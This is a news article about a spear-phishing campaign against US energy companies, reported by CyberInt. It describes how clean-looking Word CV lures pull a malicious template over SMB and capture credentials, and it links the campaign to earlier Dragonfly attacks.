A new cyber-attack vector against energy companies has reared its head, with the potential to cause power cuts, disrupt vital facilities and even cost lives.
In the attacks so far picked up by Israel-based cybersecurity company CyberInt, a “lure” document masquerades as a curriculum vitae accompanying a harmless email. What makes this latest type of spear-phishing attack hard for the energy companies to identify is that the lure email and attached Word document are totally clean and contain no malicious code whatsoever. They are therefore undetectable to incoming email monitoring defenses.
Instead, the weaponized Word document contains a template reference that, when the document is loaded, connects to an attacker’s server via Server Message Block (SMB) to download a Word template which can include embedded malicious payloads.
The connection to the SMB server also provides the attacker with the victim’s credentials, which can be subsequently used them to acquire sensitive information and/or infiltrate the control systems used by the targeted personnel.
The campaign appears to have been taking place since May and has initially been directed at infrastructure control systems (ICS) of US energy companies. Yet, the threat now has the potential to spread to vital infrastructure in Britain.
Although the perpetrators of the new attacks remain unknown, CyberInt said that they they share many traits with the 2014 Dragonfly (aka Energetic Bear) campaign, an advanced persistent threat (APT) possibly attributed to a Russian threat actor, targeting critical infrastructures such as electrical utilities outside Russia.
Attacks targeting energy companies’ control systems and infrastructure are becoming an alarming issue worldwide, from the infamous Stuxnet malware discovered in 2010, designed to wreak havoc in Iran’s SCADA systems, to the one year-long campaign against Israel Electric Company. Nuclear facilities around the world are also being infected with malware. This is in addition to the long running campaign targeting Ukraine, which caused widespread power outages in 2015 and 2016.
“Owing to the international nature of cybercrime and cyber-terrorism, UK energy companies should take immediate steps to protect themselves against these attacks as standard monitoring and filtering of incoming emails will be ineffective if this campaign starts to spread outside the US,” said Elad Ben-Meir, CyberInt vice-president of marketing.